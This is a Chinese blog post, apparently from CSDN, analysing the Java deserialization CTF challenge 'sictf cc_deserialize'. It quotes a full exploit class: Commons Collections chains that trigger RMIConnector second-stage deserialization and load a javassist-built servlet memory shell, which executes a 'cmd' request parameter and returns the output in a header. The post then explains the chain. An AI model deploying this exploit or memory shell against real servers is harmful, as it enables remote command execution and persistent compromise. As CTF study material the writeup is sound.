java反序列化例题分析

最新推荐文章于 2024-09-15 09:47:04 发布
最新推荐文章于 2024-09-15 09:47:04 发布
阅读量735 收藏 7
点赞数 22
文章标签: java python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73973498/article/details/136662275
版权

sictf cc_deserialize

刚看名字狂喜,cc链刚学完,这不是简简单单,看完题目自闭,和cc链有关系,但不多,悲!

考点:

1. 基于cc链上的研究
2. rmi二次反序列化
3. java不出网
2. javassist缩短payload

思路:

因为我是赛后复现,也没环境,这里就直接分析wp了。

package com.n1ght_cc_deserialize;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;
import javassist.*;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import javax.management.remote.JMXServiceURL;
import javax.management.remote.rmi.RMIConnector;
import javax.xml.transform.Templates;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.URLEncoder;
import java.util.HashMap;
import java.util.Map;
import java.util.Scanner;

/**
 * Hello world!
 *
 */
public class CCDeserializeExp {

    public static void main(String[] args) throws Exception {
        JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:iiop:///stub/" + CC3Exp());
        RMIConnector rmiConnector = new RMIConnector(jmxServiceURL, new HashMap<String, String>());
        ConstantTransformer constantTransformer = new ConstantTransformer(rmiConnector);
        InvokerTransformer invokerTransformer = new InvokerTransformer("connect", null, null);
        HashMap<String, String> map = new HashMap<>();
        map.put("value", "value");
        TransformedMap decorate1 = (TransformedMap) TransformedMap.decorate(map, null, invokerTransformer);
        TransformedMap decorate = (TransformedMap) TransformedMap.decorate(decorate1, null, constantTransformer);
        Class<?> name = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor<?> declaredConstructor = name.getDeclaredConstructor(Class.class, Map.class);
        declaredConstructor.setAccessible(true);
        Object o = declaredConstructor.newInstance(Target.class, decorate);
        ByteArrayOutputStream bao = new ByteArrayOutputStream();
        new ObjectOutputStream(bao).writeObject(o);
        System.out.println(URLEncoder.encode(Base64.encode(bao.toByteArray()).replaceAll("\\s*", "")));
    }
    public static String CC3Exp() throws Exception {
        TemplatesImpl templates = new TemplatesImpl();
        Class tc = templates.getClass();
        Field nameField = tc.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates, "aaaa");
        Field bytecodesField = tc.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[] code = payload();
        byte[][] codes = {code};
        bytecodesField.set(templates, codes);
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                instantiateTransformer
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object, Object> map = new HashMap<>();
        Map<Object, Object> lazyMap = LazyMap.decorate(map, new ConstantTransformer(1));
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "aaa");
        HashMap<Object, Object> map2 = new HashMap<>();
        map2.put(tiedMapEntry, "bbb");
        lazyMap.remove("aaa");
        Class<LazyMap> c = LazyMap.class;
        Field factoryField = c.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(lazyMap, chainedTransformer);
        ByteArrayOutputStream bao = new ByteArrayOutputStream();
        new ObjectOutputStream(bao).writeObject(map2);
        return Base64.encode(bao.toByteArray()).replaceAll("\\s*", "");
    }
    public static byte[] payload() throws NotFoundException, CannotCompileException, IOException {
        String s="public MyClassLoader(){             javax.servlet.http.HttpServletRequest request = ((org.springframework.web.context.request.ServletRequestAttributes)org.springframework.web.context.request.RequestContextHolder.getRequestAttributes()).getRequest();\n" +
                "            java.lang.reflect.Field r=request.getClass().getDeclaredField(\"request\");\n" +
                "            r.setAccessible(true);" +
                "            org.apache.catalina.connector.Response response =((org.apache.catalina.connector.Request) r.get(request)).getResponse();\n"+
                "            String s =new Scanner(Runtime.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream()).next();" +
                "            response.setHeader(\"night\", s);}";
        ClassPool classPool = ClassPool.getDefault();
        classPool.importPackage(Scanner.class.getName());
        CtClass ctClass = classPool.get(AbstractTranslet.class.getName());


        CtClass calc = classPool.makeClass("MyClassLoader");
        calc.setSuperclass(ctClass);
        CtConstructor ctConstructor = CtNewConstructor.make(s, calc);
        calc.addConstructor(ctConstructor);

        return calc.toBytecode();
    }
}

主函数main中,用了cc1的链子,最终目的是调用RMIConnector.connect,实现RMI二次反序列化,也就是将一个普通的反序列化点转为一个RMI反序列化点。

  1. JMXServiceURL 是用于描述 JMX 服务的 URL 地址的类。通过创建一个 JMXServiceURL 对象,你可以指定连接到哪个 JMX Agent 上。
  2. RMIConnector 是通过 RMI 协议连接到远程 JMX Agent 的类。它接受一个 JMXServiceURL 对象和一组选项(这里用 HashMap 表示)作为参数,在这里实现了创建一个通过 RMI 协议连接到指定 JMX Agent 的连接器。

通过这段代码,实现了通过 RMI 协议连接到指定 JMX Agent 的功能,这样就可以通过 RMI 远程访问和管理 JMX 提供的管理接口,实现远程监控和管理 Java 应用程序的功能。

cc3()就是用了动态类加载来执行恶意类静态代码块中指令的链子

payload()就是构造了一个恶意类,恶意类的静态代码块中采用的是servlet的内存马(好像是防止exp长度超过8000)。

难点:

RMI二次反序列化,我也是第一次见,自己都还学不明白,就放个链接,链接中的题还用到了jdbc任意文件读取,又是新知识,猛猛学。

从一道题认识jdbc任意读文件和RMIConnector触发二次反序列化 — 2022强网拟态NoRCE

https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/Java%E4%BA%8C%E6%AC%A1%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Java%E8%A7%A6%E5%8F%91%E4%BA%8C%E6%AC%A1%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E7%82%B9.mdo

ok小学了一下学懂了,和我想的RMI二次反序列化不同,我想的是把一个普通的反序列化点转换成RMI反序列化点(开启RMI服务或监听这样子 ),然后打RMI反序列化的链子,实际上是在一个普通的反序列化点中进行反序列化,反序列化的过程中又调用了一次反序列化,通过这个反序列化直接 rce。下面理一下链子。

RMIConnector.connect()

RMIConnector.findRMIServer()

RMIConnector.findRMIServerJRMP()
然后就是进行序列化和反序列化

 在RMIConnector.findRMIServer()支持jndi,stub,ior这三个服务,理论上三者应该都能打。

 RMIConnector.findRMIServerJRMP()中会序列化base64编码的内容,这个内容我们可控,然后进行反序列化,触发rce。

M0no10gue
关注
面试题:Java序列化与反序列化
JAVAQXQ的博客
07-29 479
Externalizable继承自Serializable接口需要我们重写writeExternal()与readExternal()方法,这是强制性的实现Externalizable接口的类必须要提供一个public的无参的构造器,因为反序列化的时候需要反射创建对象Externalizable接口实现序列化,性能稍微比继承自Serializable接口好一点首先我们定义一个对象类ExUser//注意,必须加上pulic无参构造器}}}}}}}}...
PHP反序列化题目记录
BaiScorpio的博客
06-20 877
最近跑去看了下PHP反序列化,发现比起java容易理解多了,主要是一些魔法函数相关反序列化、字符逃逸的反序列化、session反序列化、POP链反序列化和PHAR反序列化,以下将记录学习过程中的一些例题学习的过程。...
java】序列化和反序列化简单示例
CamphorBlossom的博客
01-31 2121
概念 java提供了一种对象序列化的机制,该机制中,一个对象可以被表示为一个字节序列(包括对象的数据、有关对象的类型和存储的数据类型信息)。简单点说,序列化表示将对象的状态转化成特定的流的过程;反序列化表示从特定的流中获取数据重新构建成对象的过程。 流:stream,二进制的字节序列。 另一方面理解,从内存读取到硬盘上的过程,可以看做是拆分对象;从硬盘读取到内存里的过程,可以看做是组装对象。 序列化的实现 类 ObjectInputStream 和 ObjectOutputStream 是
php反序列化以及相关例题
2401_82388450的博客
04-28 1221
1.序列化就是将 对象object、字符串string、数组array、变量 转换成具有一定格式的字符串,方便保持稳定的格式在文件中传输,以便还原为原来的内容。简单来说就是将内存变成文件,在程序执行结束时,内存数据便会立即销毁,变量所储存的数据便是内存数据,而文件、数据库是“持久数据”,因此PHP序列化就是将内存的变量数据“保存”到文件中的持久数据的过程。2.反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。
从cc链认识java反序列化
m0_73973498的博客
09-30 189
基于commons Collection apache组织发布的开源库,里面主要对集合的增强以及扩展类,被广泛使用。大致概括cc链,就是有反序列化入口,同时有cc库的情况下,如何进行rce或者文件读取。
Java反序列化小练习
m0_46390077的博客
01-18 450
JAVA反序列化漏洞是由于开发者重写了readObject方法,该readObject方法方法调用了别的方法,最终执行到了例如Transfrom方法的危险方法。person调用talk时时调用了自己的talk,student中没有自己的talk但是student继承了person父类的talk方法。方法,该方法用于向标准输出设备(通常是控制台)打印一行字符串并自动换行。在这里,它打印出的是字符串"lin"。:这一行是在主方法内部的唯一一行代码,它调用了Java内置的。自己有了talk就调用自己的。
[Java反序列化]—SnakeYaml反序列化
Sentiment的博客
11-20 2132
SnakeYaml是一个完整的YAML1.1规范Processor,用于解析YAML,序列化以及反序列化,支持UTF-8/UTF-16,支持Java对象的序列化/反序列化,支持所有YAML定义的类型。题目中添加了添加authc拦截器,/admin/*的请求会被拦截,但存在绕过如/admin/*/后边加个斜杠"\",即可绕过,所以访问/admin/hello/即可。,首先获取要调用的类名也就是SPI1,通过反射获取该类,接着通过newInstance进行实例化,并retrun返回。
java反序列
ing_end的博客
09-03 309
java
Java反序列化 CC2利用链记录
LTianHang的博客
02-06 130
Java反序列化 CC2利用链记录
反序列化原理与实例讲解
qq_43395215的博客
05-18 864
博客地址:soliym.top 序列化与反序列化 序列化:把变量转换为课存储或课传输文本结构的过程 反序列化:在合适的时候把序列化后的文本结构转化为原来的变量 将变量对象持久化操作,让其离开内存保存在硬盘中,等到需要的时候,在从硬盘中加载变量对象到内存中,这样就可以大大节约内存地址 意义:序列化和反序列的结合可以轻松的存储和传输数据,我们可以把对象序列化为不同的格式,json、XML、二进制、SOAP等 使用序列化 1、将内存中的类写入文件或者数据库中 2、递归保存对象引用的每一个对象数据 3、分布式对象
第二十二天php反序列化问题
代码审计
03-31 1915
序列化 百度百科上关于序列化的定义是, 将对象的状态信息转换为可以存储或传输的形式的过程。在序列化 期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对 象的状态,重新创建该对象。 简单的说,序列化就是把一个对象变成可以传输的字符串,可以以特定的格式在进程之间跨平台、安 全的进行通信。 PHP中的序列化与反序列化 PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一 旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没
java数组列表的序列化存储例题
05-24
下面是一个简单的例子,展示了如何使用Java的ArrayList类进行序列化和存储...请注意,要进行序列化和反序列化,需要使用Java的ObjectOutputStream和ObjectInputStream类。此外,存储文件的文件名可以根据需要进行更改。
Java-网络
2301_81543552的博客
09-14 716
Java中的网络编程主要涉及使用Socket类进行网络通信,以及理解各种网络协议。以下是一些关键概念和示例代码,帮助您入门。
自动生成不重复的订单id
ClaireCheney的博客
09-13 299
【代码】自动生成不重复的订单id。
【学习笔记】手写 Tomcat 三
LearnTech_123的博客
09-12 1163
响应动态资源不需要写文件名了,只需要写功能的名称即可。比如登录功能,可以定义名称为 doLogin
Java项目: 基于SpringBoot+mybatis+maven课程答疑系统(含源码+数据库+毕业论文)
weixin_43860634的博客
09-14 755
Java项目: 基于SpringBoot+mybatis+maven课程答疑系统(含源码+数据库+毕业论文)
面试题篇: 跨域问题如何处理(Java和Nginx处理方式)
m0_66572126的博客
09-14 691
最常见的解决方案是在服务器端配置 CORS 头。服务器需要在响应中添加适当的 Access-Control-Allow-头来允许跨域请求。
Gradle
最新发布
xiaocaij_icai的博客
09-15 197
");
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值